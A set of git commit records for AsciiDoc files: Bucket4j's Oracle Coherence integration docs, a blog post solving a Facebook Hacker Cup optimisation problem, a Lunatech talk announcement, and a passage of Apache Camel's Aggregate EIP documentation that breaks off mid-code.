{"commit":"382aab0941e431b5d7d6b1706f232cc5fe5b9fa7","subject":"coherence.adoc","message":"coherence.adoc\n","repos":"vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j","old_file":"asciidoc\/src\/main\/docs\/asciidoc\/distributed\/jcache\/coherence.adoc","new_file":"asciidoc\/src\/main\/docs\/asciidoc\/distributed\/jcache\/coherence.adoc","new_contents":"[[bucket4j-coherence, Bucket4j-Coherence]]\n=== Oracle Coherence integration\n==== Dependencies\nTo use ``bucket4j-coherence`` extension you need to add the following dependency:\n[source, xml, subs=attributes+]\n----\n<dependency>\n <groupId>com.github.vladimir-bukhtoyarov<\/groupId>\n <artifactId>bucket4j-coherence<\/artifactId>\n <version>{revnumber}<\/version>\n<\/dependency>\n----\n\n==== Example of Bucket instantiation\n[source, java]\n----\ncom.tangosol.net.NamedCache<K, byte[]> cache = ...;\nprivate static final CoherenceProxyManager<K> proxyManager = new CoherenceProxyManager(map);\n\n...\nBucketConfiguration configuration = BucketConfiguration.builder()\n .addLimit(Bandwidth.simple(1_000, Duration.ofMinutes(1)))\n .build(key, configuration);\n\nBucket bucket = proxyManager.builder().build(configuration);\n----\n\n==== Configuring POF serialization for Bucket4j library classes\nIf you configure nothing, then by default Java serialization will be used for serialization Bucket4j library classes. Java serialization can be rather slow and should be avoided in general.\n``Bucket4j`` provides https:\/\/docs.oracle.com\/cd\/E24290_01\/coh.371\/e22837\/api_pof.htm#COHDG1363[custom POF serializers] for all library classes that could be transferred over the network.\nTo let Coherence know about POF serializers you should register three serializers in the POF configuration config file:\n====\n``io.github.bucket4j.grid.coherence.pof.CoherenceEntryProcessorPofSerializer`` for class ``io.github.bucket4j.grid.coherence.CoherenceProcessor``\n====\n\n.Example of POF serialization config:\n[source, xml]\n----\n<pof-config xmlns=\"http:\/\/xmlns.oracle.com\/coherence\/coherence-pof-config\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/xmlns.oracle.com\/coherence\/coherence-pof-config coherence-pof-config.xsd\">\n\n <user-type-list>\n <!-- Include default Coherence types -->\n <include>coherence-pof-config.xml<\/include>\n\n <!-- Define serializers for Bucket4j classes -->\n <user-type>\n <type-id>1001<\/type-id>\n <class-name>io.github.bucket4j.grid.coherence.CoherenceProcessor<\/class-name>\n <serializer>\n <class-name>io.github.bucket4j.grid.coherence.pof.CoherenceEntryProcessorPofSerializer<\/class-name>\n <\/serializer>\n <\/user-type>\n <\/user-type-list>\n<\/pof-config>\n----\nDouble-check with https:\/\/docs.oracle.com\/cd\/E24290_01\/coh.371\/e22837\/api_pof.htm#COHDG5182[official Oracle Coherence documentation] in case of any questions related to ``Portable Object Format``.\n","old_contents":"[[bucket4j-coherence, Bucket4j-Coherence]]\n=== Oracle Coherence integration\n==== Dependencies\nTo use ``bucket4j-coherence`` extension you need to add following dependency:\n[source, xml, subs=attributes+]\n----\n<dependency>\n <groupId>com.github.vladimir-bukhtoyarov<\/groupId>\n <artifactId>bucket4j-coherence<\/artifactId>\n <version>{revnumber}<\/version>\n<\/dependency>\n----\n\n==== Example of Bucket instantiation\n[source, java]\n----\ncom.tangosol.net.NamedCache<K, byte[]> cache = ...;\nprivate static final CoherenceProxyManager<K> proxyManager = new CoherenceProxyManager(map);\n\n...\nBucketConfiguration configuration = BucketConfiguration.builder()\n .addLimit(Bandwidth.simple(1_000, Duration.ofMinutes(1)))\n .build(key, configuration);\n\nBucket bucket = proxyManager.builder().build(configuration);\n----\n\n==== Configuring POF serialization for Bucket4j library classes\nIf you configure nothing, then by default Java serialization will be used for serialization Bucket4j library classes. Java serialization can be rather slow and should be avoided in general.\n``Bucket4j`` provides https:\/\/docs.oracle.com\/cd\/E24290_01\/coh.371\/e22837\/api_pof.htm#COHDG1363[custom POF serializers] for all library classes that could be transferred over network.\nTo let Coherence know about POF serializers you should register three serializers in the POF configuration config file: \n====\n``io.github.bucket4j.grid.coherence.pof.CoherenceEntryProcessorPofSerializer`` for class ``io.github.bucket4j.grid.coherence.CoherenceProcessor``\n====\n\n.Example of POF serialization config:\n[source, xml]\n----\n<pof-config xmlns=\"http:\/\/xmlns.oracle.com\/coherence\/coherence-pof-config\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/xmlns.oracle.com\/coherence\/coherence-pof-config coherence-pof-config.xsd\">\n\n <user-type-list>\n <!-- Include default Coherence types -->\n <include>coherence-pof-config.xml<\/include>\n\n <!-- Define serializers for Bucket4j classes -->\n <user-type>\n <type-id>1001<\/type-id>\n <class-name>io.github.bucket4j.grid.coherence.CoherenceProcessor<\/class-name>\n <serializer>\n <class-name>io.github.bucket4j.grid.coherence.pof.CoherenceEntryProcessorPofSerializer<\/class-name>\n <\/serializer>\n <\/user-type>\n <\/user-type-list>\n<\/pof-config>\n----\nDouble check with https:\/\/docs.oracle.com\/cd\/E24290_01\/coh.371\/e22837\/api_pof.htm#COHDG5182[official Oracle Coherence documentation] in case of any questions related to ``Portable Object Format``.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5348ee0293ba0a0bbf6e666f5f9c1f496c08ce4b","subject":"Update 2016-05-22-Facebook-hacker-cup-Power-Overwhelming.adoc","message":"Update 2016-05-22-Facebook-hacker-cup-Power-Overwhelming.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2016-05-22-Facebook-hacker-cup-Power-Overwhelming.adoc","new_file":"_posts\/2016-05-22-Facebook-hacker-cup-Power-Overwhelming.adoc","new_contents":"= Facebook hacker cup: Power Overwhelming\n:hp-tags: competitions, migrated\n\nYou are to inflict maximum damage to the zerg army. There are two types of units - Warrior and Shield. Warriors do damage every second, while a shield protects your entire army for one second. Your army is instantly overrun after the shield generators expire. Given \\(G\\) cost to build a shield, \\(W\\) cost to build a warrior and total money \\(M\\), how many shields would you build?\n\n=== Solution\n\nLet \\(X\\) and \\(Y\\) be the optimal number of generators and number of warriors to be built, respectively. Let's start with a simple concrete example. Suppose shields and warriors both cost 1 unit and you have total money of 5 units. Also assume 1 unit of damage per warrior. What is the optimum value of \\(X\\) and \\(Y\\)? It would be optimum if you can inflict maximum damage. With 5 units of money, you can buy shields\/warriors in the following combinations.\n\n.Combinations of \\(X, Y\\)\n|===\n|X |Y |Damage\n\n|1\n|4\n|4\n\n|2\n|3\n|6\n\n|3\n|2\n|6\n\n|4\n|1\n|4\n|===\n\nIn this case, the optimal choice of \\(X, Y\\) seem to be \\((2, 3)\\) and \\((3, 4)\\) respectively, both of which maximize the product \\(XY\\). In the general case, the cost to buy \\(X\\) generators is \\(XG\\), cost to buy \\(Y\\) warriors is \\(YW\\). Since we are limited by \\(M\\) amount of money, \\(X, Y\\) must satisfy \\(XG + YW \\le M\\). This can be represented as a line and the inequality encapsulates a region for candidate \\((X, Y)\\) values.\n\n.Candidate solution region\nimage::post2\/fig1.png[]\n\nWe want \\(X, Y \\mid \\arg\\max{XY} \\). Geometrically, \\(XY\\) represents the area of the rectangle shaded in blue.\n\n.The area to be maximized\nimage::post2\/fig2.png[]\n\nWe need to find integer values of \\(X, Y\\) that maximize this area. \n\nHow do we go about doing that?\nWe know that the line will intersect X and Y axis at \\(M\/G, M\/W\\). \nWe also know that the optimal rectangle touches the line. If it doesn't, the area can be trivially increased by increasing either\/both \\(X, Y\\) values until it touches the line.\n\nThe boring calculus way for figuring this out is as follows:\n\n\\(A = XY \\\\\nA = \\frac{M - YW}{G}Y \\\\\n\\\\\n\\frac{\\partial A}{\\partial Y} = \\frac{Y(M - WY)}{G} \\\\\n\\arg\\max{A} \\implies \\frac{Y(M - WY)}{G} = 0 \\\\\nY = M \/ 2W \\)\n\nThis gives corresponding \\(X = M\/2G\\)\n\nA more interesting way to arrive at the same conclusion would be to think as follows:\n- The shaded triangle increases its area as long as X and Y increase.\n- Start with \\((0, 0)\\) and increase both \\(X, Y\\) by 1. This gives us a small rectangle with bottom left \\((0, 0)\\) and top right \\((1, 1)\\).\n- If the straight line was X + Y = 1, it would be a right angled isosceles triangle. The \\(X, Y\\) value would always increase in the direction of line \\(Y = X\\), which would cut the line in middle at \\((X\/2, Y\/2)\\)\n- Generalizing this, the value of \\(X. Y\\) will increase as long as we go on the direction of line that joins \\((0, 0)\\) to midpoint of the line \\(XG + YW = M\\). The mid point of this line is, unsurprisingly, \\(M\/2G, M\/2W)\\)\n\nThere are other ways to arrive at this. Perhaps I should write a post that exclusively deals with this problem.\n\nComing back to our original question, the optimal number of shields must be \\(M\/2G\\). If, \\(M\/2G\\) is not an integer, we go towards the origin on the line that joins \\((0, 0)\\) and \\(M\/2G, M\/2W)\\). However,I was able to get away by taking \\(\\lfoor M\/2G \\rfloor\\).","old_contents":"= Facebook hacker cup: Power Overwhelming\n:hp-tags: competitions, migrated\n\nYou are to inflict maximum damage to the zerg army. There are two types of units - Warrior and Shield. Warriors do damage every second, while a shield protects your entire army for one second. Your army is instantly overrun after the shield generators expire. Given \\(G\\) cost to build a shield, \\(W\\) cost to build a warrior and total money \\(M\\), how many shields would you build?\n\n=== Solution\n\nLet \\(X\\) and \\(Y\\) be the optimal number of generators and number of warriors to be built, respectively. Let's start with a simple concrete example. Suppose shields and warriors both cost 1 unit and you have total money of 5 units. Also assume 1 unit of damage per warrior. What is the optimum value of \\(X\\) and \\(Y\\)? It would be optimum if you can inflict maximum damage. With 5 units of money, you can buy shields\/warriors in the following combinations.\n\n.Combinations of \\(X, Y\\)\n|===\n|X |Y |Damage\n\n|1\n|4\n|4\n\n|2\n|3\n|6\n\n|3\n|2\n|6\n\n|4\n|1\n|4\n|===\n\nIn this case, the optimal choice of \\(X, Y\\) seem to be \\((2, 3)\\) and \\((3, 4)\\) respectively, both of which maximize the product \\(XY\\). In the general case, the cost to buy \\(X\\) generators is \\(XG\\), cost to buy \\(Y\\) warriors is \\(YW\\). Since we are limited by \\(M\\) amount of money, \\(X, Y\\) must satisfy \\(XG + YW \\le M\\). This can be represented as a line and the inequality encapsulates a region for candidate \\((X, Y)\\) values.\n\n.Candidate solution region\nimage::post2\/fig1.png[]\n\nWe want \\(X, Y \\mid \\arg\\max{XY} \\). Geometrically, \\(XY\\) represents the area of the rectangle shaded in blue.\n\n.The area to be maximized\nimage::post2\/fig2.png[]\n\nWe need to find integer values of \\(X, Y\\) that maximize this area. \n\nHow do we go about doing that?\nWe know that the line will intersect X and Y axis at \\(M\/G, M\/W\\). \nWe also know that the optimal rectangle touches the line. If it doesn't, the area can be trivially increased by increasing either\/both \\(X, Y\\) values until it touches the line.\n\nThe boring calculus way for figuring this out is as follows:\n\\(A = XY \\\\\nA = \\frac{M - YW}{G}Y \\\\\n\\\\\n\\frac{\\partial A}{\\partial Y} = \\frac{Y(M - WY)}{G} \\\\\n\\arg\\max{A} \\implies \\frac{Y(M - WY)}{G} = 0 \\\\\nY = M \/ 2W \\)\n\nThis gives corresponding \\(X = M\/2G\\)\n\nA more interesting way to arrive at the same conclusion would be to think as follows:\n- The shaded triangle increases its area as long as X and Y increase.\n- Start with \\((0, 0)\\) and increase both \\(X, Y\\) by 1. This gives us a small rectangle with bottom left \\((0, 0)\\) and top right \\((1, 1)\\).\n- If the straight line was X + Y = 1, it would be a right angled isosceles triangle. The \\(X, Y\\) value would always increase in the direction of line \\(Y = X\\), which would cut the line in middle at \\((X\/2, Y\/2)\\)\n- Generalizing this, the value of \\(X. Y\\) will increase as long as we go on the direction of line that joins \\((0, 0)\\) to midpoint of the line \\(XG + YW = M\\). The mid point of this line is, unsurprisingly, \\(M\/2G, M\/2W)\\)\n\nThere are other ways to arrive at this. Perhaps I should write a post that exclusively deals with this problem.\n\nComing back to our original question, the optimal number of shields must be \\(M\/2G\\). If, \\(M\/2G\\) is not an integer, we go towards the origin on the line that joins \\((0, 0)\\) and \\(M\/2G, M\/2W)\\). However,I was able to get away by taking \\(\\lfoor M\/2G \\rfloor\\).","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d6333fbdfcd20cda330b9ede566e05819dcef3ad","subject":"Update 2016-05-26-Clever-Clouds-CEO-to-speak-at-Lunatech.adoc","message":"Update 2016-05-26-Clever-Clouds-CEO-to-speak-at-Lunatech.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-05-26-Clever-Clouds-CEO-to-speak-at-Lunatech.adoc","new_file":"_posts\/2016-05-26-Clever-Clouds-CEO-to-speak-at-Lunatech.adoc","new_contents":"# Clever Cloud\u2019s CEO to speak at Lunatech\n\n:published_at: 2016-05-26\n:hp-tags: company\n\nFriday 27 May 2016 Clever Cloud\u2019s CEO, *Quentin Adam*, will be visiting Lunatech where he will give a presentation about using Clever Cloud with Scala.\n\nClever Cloud is a \u201cEurope-based PaaS company\u201d that helps \u201cdevelopers deploy and run their apps with bulletproof infrastructure, automatic scaling, fair pricing\u201d and aims \u201cto make an easy-to-use service, without any vendor lock-in\u201d.\n\nDue to his experience at Clever Cloud \u2014 where he can work a wide range of technologies and tools \u2014 he has a lot of knowledge and is able to speak about many different subjects. He regularly speaks at various tech conferences.\n\nWe are opening up the presentation to everyone. Feel free to join us at 16:00.","old_contents":"# Clever Cloud\u2019s CEO to speak at Lunatech\n\n:published_at: 2016-01-25\n:hp-tags: company\n\nFriday 27 May 2016 Clever Cloud\u2019s CEO, *Quentin Adam*, will be visiting Lunatech where he will give a presentation about using Clever Cloud with Scala.\n\nClever Cloud is a \u201cEurope-based PaaS company\u201d that helps \u201cdevelopers deploy and run their apps with bulletproof infrastructure, automatic scaling, fair pricing\u201d and aims \u201cto make an easy-to-use service, without any vendor lock-in\u201d.\n\nDue to his experience at Clever Cloud \u2014 where he can work a wide range of technologies and tools \u2014 he has a lot of knowledge and is able to speak about many different subjects. He regularly speaks at various tech conferences.\n\nWe are opening up the presentation to everyone. Feel free to join us at 16:00.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"8773de13b5fde62c748d8cf4f563f0b919180f59","subject":"CAMEL-16861: Cleanup docs","message":"CAMEL-16861: Cleanup docs\n","repos":"cunningt\/camel,apache\/camel,adessaigne\/camel,christophd\/camel,tadayosi\/camel,tadayosi\/camel,adessaigne\/camel,apache\/camel,cunningt\/camel,adessaigne\/camel,christophd\/camel,christophd\/camel,apache\/camel,christophd\/camel,christophd\/camel,pax95\/camel,cunningt\/camel,pax95\/camel,apache\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,cunningt\/camel,tadayosi\/camel,christophd\/camel,pax95\/camel,apache\/camel,pax95\/camel,apache\/camel,cunningt\/camel,adessaigne\/camel,pax95\/camel,adessaigne\/camel,adessaigne\/camel,pax95\/camel,tadayosi\/camel","old_file":"core\/camel-core-engine\/src\/main\/docs\/modules\/eips\/pages\/aggregate-eip.adoc","new_file":"core\/camel-core-engine\/src\/main\/docs\/modules\/eips\/pages\/aggregate-eip.adoc","new_contents":"= Aggregate EIP\n:doctitle: Aggregate\n:shortname: aggregate\n:description: Aggregates many messages into a single message\n:since: \n:supportlevel: Stable\n\nThe\nhttp:\/\/www.enterpriseintegrationpatterns.com\/Aggregator.html[Aggregator]\nfrom the xref:enterprise-integration-patterns.adoc[EIP patterns] allows\nyou to combine a number of messages together into a single message.\n\nHow do we combine the results of individual, but related messages so that they can be processed as a whole?\n\nimage::eip\/Aggregator.gif[image]\n\nUse a stateful filter, an Aggregator, to collect and store individual messages until a complete set of related messages has been received. Then, the Aggregator publishes a single message distilled from the individual messages.\n\nThe aggregator is one of the most complex EIP and has many features and configurations.\n\nThe logic for combing messages together is _correlated_ in buckets based on a _correlation key_.\nMessages with the same correlation key is aggregated together, using an `AggregationStrategy`.\n\n== Aggregate options\n\n\/\/ eip options: START\ninclude::partial$eip-options.adoc[]\n\/\/ eip options: END\n\n== Worker pools\n\nThe aggregate EIP will always use a worker pool, that is used to process all the outgoing messages from the aggregator.\nThe worker pool is determined accordingly:\n\n- If a custom `ExecutorService` has been configured, then this is used as worker pool.\n- If `parallelProcessing=true` then a _default_ worker pool (is 10 worker threads by default) is created.\nHowever, the thread pool size and other configurations can be configured using _thread pool profiles_.\n- Otherwise, a single threaded worker pool is created.\n\n== Aggregating\n\nThe `AggregationStrategy` is used for aggregating the old, and the new exchanges together into a single exchange;\nthat becomes the next old, when the next message is aggregated, and so forth.\n\nPossible implementations include performing some kind of combining or\ndelta processing, such as adding line items together into an invoice or\njust using the newest exchange and removing old exchanges such as for\nstate tracking or market data prices; where old values are of little\nuse.\n\nNotice the aggregation strategy is a mandatory option and must be\nprovided to the aggregator.\n\nIMPORTANT: In the aggregate method, do not create a new exchange instance to return,\ninstead return either the old or new exchange from the input parameters;\nfavor returning the old exchange whenever possible.\n\nHere are a few example `AggregationStrategy` implementations that should\nhelp you create your own custom strategy.\n\n[source,java]\n----\n\/\/simply combines Exchange String body values using '+' as a delimiter\nclass StringAggregationStrategy implements AggregationStrategy {\n\n public Exchange aggregate(Exchange oldExchange, Exchange newExchange) {\n if (oldExchange == null) {\n return newExchange;\n }\n\n String oldBody = oldExchange.getIn().getBody(String.class);\n String newBody = newExchange.getIn().getBody(String.class);\n oldExchange.getIn().setBody(oldBody + \"+\" + newBody);\n return oldExchange;\n }\n}\n\n\/\/simply combines Exchange body values into an ArrayList<Object>\nclass ArrayListAggregationStrategy implements AggregationStrategy {\n\n public Exchange aggregate(Exchange oldExchange, Exchange newExchange) {\n Object newBody = newExchange.getIn().getBody();\n ArrayList<Object> list = null;\n if (oldExchange == null) {\n list = new ArrayList<Object>();\n list.add(newBody);\n newExchange.getIn().setBody(list);\n return newExchange;\n } else {\n list = oldExchange.getIn().getBody(ArrayList.class);\n list.add(newBody);\n return oldExchange;\n }\n }\n}\n----\n\nTIP: The `org.apache.camel.builder.AggregationStrategies` is a builder that can\nbe used for creating commonly used aggregation strategies without having to create a class.\n\n=== Exchange Properties\n\nThe completed (outgoing) exchange from the Aggregate EIP contains the following information\nas exchange properties, allowing you to know how the exchange was completed, and how\nmany messages were combined.\n\n[width=\"100%\",cols=\"3,1m,6\",options=\"header\"]\n|=======================================================================\n| Property | Type | Description\n| `CamelAggregatedSize` | `int` | The total number of messages aggregated.\n| `CamelAggregatedCompletedBy` | `String` | The condition that triggered the completion. Possible values are size, timeout, interval, predicate, force, strategy, and consumer. The consumer value represents the completion from batch consumer.\n| `CamelAggregatedCorrelationKey` | `String` | The correlation identifier as a `String`.\n| `CamelAggregatedTimeout` | `long` | The time-out in milliseconds as set by the completion time-out.\n|=======================================================================\n\n\n=== Aggregate by grouping exchanges\n\nIn the route below we group all the exchanges together using\n`GroupedExchangeAggregationStrategy`:\n\n[source,java]\n----\nfrom(\"direct:start\")\n \/\/ aggregate all using same expression and group the\n \/\/ exchanges so we get one single exchange containing all\n \/\/ the others\n .aggregate(new GroupedExchangeAggregationStrategy()).constant(true)\n \/\/ wait for 0.5 seconds to aggregate\n .completionTimeout(500L).to(\"mock:result\");\n----\n\nAs a result we have one outgoing `Exchange` being\nrouted to the `\"mock:result\"` endpoint. The exchange is a holder\ncontaining all the incoming Exchanges.\n\nThe output of the aggregator will then contain the exchanges grouped\ntogether in a list as shown below:\n\n[source,java]\n----\nList<Exchange> grouped = exchange.getMessage().getBody(List.class);\n----\n\n=== Aggregating into a List\n\nIf you want to aggregate some value from the messages `<V>` into a `List<V>`\nthen you can use the\n`org.apache.camel.processor.aggregate.AbstractListAggregationStrategy`\nabstract class.\n\nThe completed Exchange that is sent out of the aggregator will contain the `List<V>` in\nthe message body.\n\nFor example to aggregate a `List<Integer>` you can extend this class as\nshown below, and implement the `getValue` method:\n\n[source,java]\n----\npublic class MyListOfNumbersStrategy extends AbstractListAggregationStrategy<Integer> {\n\n @Override\n public Integer getValue(Exchange exchange) {\n \/\/ the message body contains a number, so just return that as-is\n return exchange.getIn().getBody(Integer.class);\n }\n}\n----\n\nThe `org.apache.camel.builder.AggregationStrategies` is a builder that can\nbe used for creating commonly used aggregation strategies without having to create a class.\n\nThe previous example can also be built using the builder as shown:\n\n[source,java]\n----\nAggregationStrategy agg = AggregationStrategies.flexible(Integer.class)\n .accumulateInCollection(ArrayList.class)\n .pick(body());\n----\n\n=== Aggregating on timeout\n\nIf your aggregation strategy implements\n`TimeoutAwareAggregationStrategy`, then Camel will invoke the `timeout`\nmethod when the timeout occurs. Notice that the values for index and\ntotal parameters will be -1, and the timeout parameter will be provided\nonly if configured as a fixed value. You must *not* throw any exceptions\nfrom the `timeout` method.\n\n=== Aggregate with persistent repository\n\nThe aggregator provides a pluggable repository which you can implement\nyour own `org.apache.camel.spi.AggregationRepository`.\n\nIf you need persistent repository then Camel provides numerous implementations, such as from the\nxref:ROOT:caffeine-cache-component.adoc[Caffeine],\nxref:ROOT:cql-component.adoc[CassandraQL],\nxref:ROOT:ehcache-component.adoc[EHCache],\nxref:ROOT:infinispan-component.adoc[Infinispan],\nxref:ROOT:jcache-component.adoc[JCache],\nxref:others:leveldb.adoc[LevelDB],\nxref:others:redis.adoc[Redis],\nor xref:ROOT:sql-component.adoc[SQL] components.\n\n== Completion\n\nWhen aggregation xref:manual::exchange.adoc[Exchange]s at some point you need to\nindicate that the aggregated exchanges is complete, so they can be sent\nout of the aggregator. Camel allows you to indicate completion in\nvarious ways as follows:\n\n* _completionTimeout_ - Is an inactivity timeout in which is triggered if\nno new exchanges have been aggregated for that particular correlation\nkey within the period.\n* _completionInterval_ - Once every X period all the current aggregated\nexchanges are completed.\n* _completionSize_ - Is a number indicating that after X aggregated\nexchanges its complete.\n* _completionPredicate_ - Runs a xref:manual::predicate.adoc[Predicate] when a new\nexchange is aggregated to determine if we are complete or not.\nThe configured aggregationStrategy can implement the\nPredicate interface and will be used as the completionPredicate if no\ncompletionPredicate is configured. The configured aggregationStrategy can\noverride the `preComplete` method and will be used as\nthe completionPredicate in pre-complete check mode. See further below\nfor more details.\n* _completionFromBatchConsumer_ - Special option for\nxref:manual::batch-consumer.adoc[Batch Consumer] which allows you to complete\nwhen all the messages from the batch has been aggregated.\n* _forceCompletionOnStop_ - Indicates to complete all current\naggregated exchanges when the context is stopped\n* _AggregateController_ - which allows to use an external source (`AggregateController` implementation) to complete groups or all groups.\nThis can be done using Java or JMX API.\n\nAll the different completions are per correlation key. You can\ncombine them in any way you like. It's basically the first which\ntriggers that wins. So you can use a completion size together with a\ncompletion timeout. Only completionTimeout and completionInterval cannot\nbe used at the same time.\n\nCompletion is mandatory and must be configured on the aggregation.\n\n=== Pre-completion mode\n\nThere can be use-cases where you want the incoming\nxref:manual::exchange.adoc[Exchange] to determine if the correlation group\nshould pre-complete, and then the incoming\nxref:manual::exchange.adoc[Exchange] is starting a new group from scratch.\nThe pre-completion mode must be enabled by the `AggregationStrategy` by overriding the `canPreComplete` method\nto return a `true` value.\n\nWhen pre completion is enabled then the `preComplete` method is invoked:\n\n[source,java]\n----\n\/**\n * Determines if the aggregation should complete the current group, and start a new group, or the aggregation\n * should continue using the current group.\n *\n * @param oldExchange the oldest exchange (is <tt>null<\/tt> on first aggregation as we only have the new exchange)\n * @param newExchange the newest exchange (can be <tt>null<\/tt> if there was no data possible to acquire)\n * @return <tt>true<\/tt> to complete current group and start a new group, or <tt>false<\/tt> to keep using current\n *\/\nboolean preComplete(Exchange oldExchange, Exchange newExchange);\n----\n\nIf the `preComplete` method returns `true`, then the existing correlation groups is\ncompleted (without aggregating the incoming exchange (`newExchange`).\nThen the `newExchange` is used to start the correlation group from scratch,\nso the group would contain only that new incoming exchange. This is\nknown as pre-completion mode.\n\nWhen the aggregation is in _pre-completion_ mode, then only the following completions are in use:\n\n* _completionTimeout_ or _completionInterval_ can also be used as fallback\ncompletions\n* any other completion are not used (such as by size, from batch consumer etc)\n* _eagerCheckCompletion_ is implied as `true`, but the option has no effect\n\n=== CompletionAwareAggregationStrategy\n\nIf your aggregation strategy implements\n`CompletionAwareAggregationStrategy`, then Camel will invoke the\n`onComplete` method when the aggregated `Exchange` is completed. This\nallows you to do any last minute custom logic such as to clean up some\nresources, or additional work on the exchange as it's now completed.\nYou must *not* throw any exceptions from the `onCompletion` method.\n\n=== Completing current group decided from the AggregationStrategy\n\nThe `AggregationStrategy` supports checking for the\n\nthe exchange property (`Exchange.AGGREGATION_COMPLETE_CURRENT_GROUP`)\non the returned `Exchange` that contains a boolean to indicate if the current\ngroup should be completed. This allows to overrule any existing\ncompletion predicates \/ sizes \/ timeouts etc, and complete the group.\n\nFor example the following logic will complete the\ngroup if the message body size is larger than 5. This is done by setting\nthe exchange property `Exchange.AGGREGATION_COMPLETE_CURRENT_GROUP` to `true`.\n\n[source,java]\n----\npublic final class MyCompletionStrategy implements AggregationStrategy {\n @Override\n public Exchange aggregate(Exchange oldExchange, Exchange newExchange) {\n if (oldExchange == null) {\n return newExchange;\n }\n String body = oldExchange.getIn().getBody(String.class) + \"+\"\n + newExchange.getIn().getBody(String.class);\n oldExchange.getIn().setBody(body);\n if (body.length() >= 5) {\n oldExchange.setProperty(Exchange.AGGREGATION_COMPLETE_CURRENT_GROUP, true);\n }\n return oldExchange;\n }\n}\n----\n\n=== Completing all previous group decided from the AggregationStrategy\n\nThe `AggregationStrategy` checks an exchange property, from the returned exchange,\nindicating if all previous groups should be completed.\n\nThis allows to overrule any existing\ncompletion predicates \/ sizes \/ timeouts etc, and complete all the existing\nprevious group.\n\nThe following logic will complete all the\nprevious groups, and start a new aggregation group.\n\nThis is done by setting the property `Exchange.AGGREGATION_COMPLETE_ALL_GROUPS` to `true`\non the returned exchange.\n\n[source,java]\n----\npublic final class MyCompletionStrategy implements AggregationStrategy {\n @Override\n public Exchange aggregate(Exchange oldExchange, Exchange newExchange) {\n if (oldExchange == null) {\n \/\/ we start a new correlation group, so complete all previous groups\n newExchange.setProperty(Exchange.AGGREGATION_COMPLETE_ALL_GROUPS, true);\n return newExchange;\n }\n\n String body1 = oldExchange.getIn().getBody(String.class);\n String body2 = newExchange.getIn().getBody(String.class);\n\n oldExchange.getIn().setBody(body1 + body2);\n return oldExchange;\n }\n}\n----\n\n=== Manually force the completion of all aggregated Exchanges immediately\n\nYou can manually trigger completion of all current aggregated exchanges\nby sending an exchange containing the exchange property\n`Exchange.AGGREGATION_COMPLETE_ALL_GROUPS` set to `true`. The message is\nconsidered a signal message only, the message headers\/contents will not\nbe processed otherwise.\n\nYou can alternatively set the exchange property\n`Exchange.AGGREGATION_COMPLETE_ALL_GROUPS_INCLUSIVE` to `true` to trigger\ncompletion of all groups after processing the current message.\n\n=== Using a controller to force the aggregator to complete\n\nThe `org.apache.camel.processor.aggregate.AggregateController` allows\nyou to control the aggregate at runtime using Java or JMX API. This can\nbe used to force completing groups of exchanges, or query its current\nruntime statistics.\n\nThe aggregator provides a default implementation if no custom have been\nconfigured, which can be accessed using `getAggregateController()` method.\nThough it may be easier to configure a controller in the route using\n`aggregateController` as shown below:\n\n[source,java]\n----\nprivate AggregateController controller = new DefaultAggregateController();\n\nfrom(\"direct:start\")\n .aggregate(header(\"id\"), new MyAggregationStrategy())\n .completionSize(10).id(\"myAggregator\")\n .aggregateController(controller)\n .to(\"mock:aggregated\");\n----\n\nThen there is API on `AggregateController` to force completion. For\nexample to complete a group with key foo:\n\n[source,java]\n----\nint groups = controller.forceCompletionOfGroup(\"foo\");\n----\n\nThe returned value is the number of groups completed.\nA value of 1 is returned if the foo group existed, otherwise 0 is returned.\n\nThere is also a method to complete all groups:\n\n[source,java]\n----\nint groups = controller.forceCompletionOfAllGroups();\n----\n\nThe controller can also be used in XML DSL using the `aggregateControllerRef` to\nrefer to a bean with the controller implementation, which is looked up in the registry.\n\nWhen using Spring XML you can create the bean with `<bean>` as shown:\n\n[source,xml]\n----\n<bean id=\"myController\" class=\"org.apache.camel.processor.aggregate.DefaultAggregateController\"\/>\n \n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:start\"\/>\n <aggregate strategyRef=\"myAppender\" completionSize=\"10\"\n aggregateControllerRef=\"myController\">\n <correlationExpression>\n <header>id<\/header>\n <\/correlationExpression>\n <to uri=\"mock:result\"\/>\n <\/aggregate>\n <\/route>\n<\/camelContext>\n----\n\nThere is also JMX API on the aggregator which is available under the processors node in the Camel JMX tree.\n\n== Aggregating with Beans\n\nTo use the `AggregationStrategy` you had to implement the\n`org.apache.camel.AggregationStrategy` interface,\nwhich means your logic would be tied to the Camel API.\nYou can use a bean for the logic and let Camel adapt to your\nbean. To use a bean a convention must be followed:\n\n* there must be a public method to use\n* the method must not be void\n* the method can be static or non-static\n* the method must have 2 or more parameters\n* the parameters are paired, so the first half is applied to the\n`oldExchange`, and the reminder half is for the `newExchange`.\n Therefore, there must be an equal number of parameters, eg 2, 4, 6 etc.\n\nThe paired methods is expected to be ordered as follows:\n\n* the first parameter is the message body\n* optional, the 2nd parameter is a `Map` of the headers\n* optional, the 3rd parameter is a `Map` of the exchange properties\n\nThis convention is best explained with some examples.\n\nIn the method below, we have only 2 parameters, so the 1st parameter is\nthe body of the `oldExchange`, and the 2nd is paired to the body of the\n`newExchange`:\n\n[source,java]\n----\npublic String append(String existing, String next) {\n return existing + next;\n}\n----\n\nIn the method below, we have only 4 parameters, so the 1st parameter is\nthe body of the `oldExchange`, and the 2nd is the `Map` of the\n`oldExchange` headers, and the 3rd is paired to the body of the `newExchange`,\nand the 4th parameter is the `Map` of the `newExchange` headers:\n\n[source,java]\n----\npublic String append(String existing, Map existingHeaders, String next, Map 